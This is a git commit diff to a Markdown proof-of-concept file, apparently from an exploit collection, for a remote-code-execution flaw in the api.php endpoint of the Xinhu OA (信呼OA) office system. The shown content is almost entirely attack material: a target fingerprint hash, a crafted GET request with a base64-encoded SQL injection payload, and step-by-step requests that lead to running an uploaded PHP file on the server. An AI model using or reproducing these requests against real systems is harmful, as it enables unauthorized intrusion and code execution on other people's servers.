Update 信呼OA办公系统后台api.php接口存在RCE.md

2025-05-05 02:07:11 +00:00 · 2025-03-31 14:37:28 +08:00 · 2025-03-31 14:37:28 +08:00 · 12144bb68e
commit 12144bb68e
parent a3f58d2aa8
1 changed files with 13 additions and 4 deletions
--- a/wpoc/信呼OA/信呼OA办公系统后台api.php接口存在RCE.md
+++ b/wpoc/信呼OA/信呼OA办公系统后台api.php接口存在RCE.md
@ -8,7 +8,7 @@
 icon_hash="1652488516"
 ```

-## poc
+## 第一步

 ```javascript
 GET /xhoa/api.php?a=getmfilv&m=upload|api&d=task&fileid=1&fname=MScgYW5kIHNsZWVwKDYpIw== HTTP/1.1  
@ -28,10 +28,19 @@ sec-ch-ua-mobile: ?0
 sec-ch-ua-platform: "Windows"  
 ```

-![image-20241128092859877](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280928931.png)
+![image](https://github.com/user-attachments/assets/0f95005f-8c4f-45a0-bed2-eba493c7b87a)

+## 第二步

+```javascript
+访问：http://xxxx/api.php?a=getmfilv&m=upload|api&d=task&fileid=返回的id值
+```

-## 漏洞来源
+![image](https://github.com/user-attachments/assets/ba6f7a2e-8c59-4c08-a87f-8f778d2ee1c4)
+
+## 第三步
+```
+通过前面第二部获取的地址直接访问即可
+http://localhost/upload/2025-03/26_rocktpl5661_1363.php
+```

- https://forum.butian.net/article/613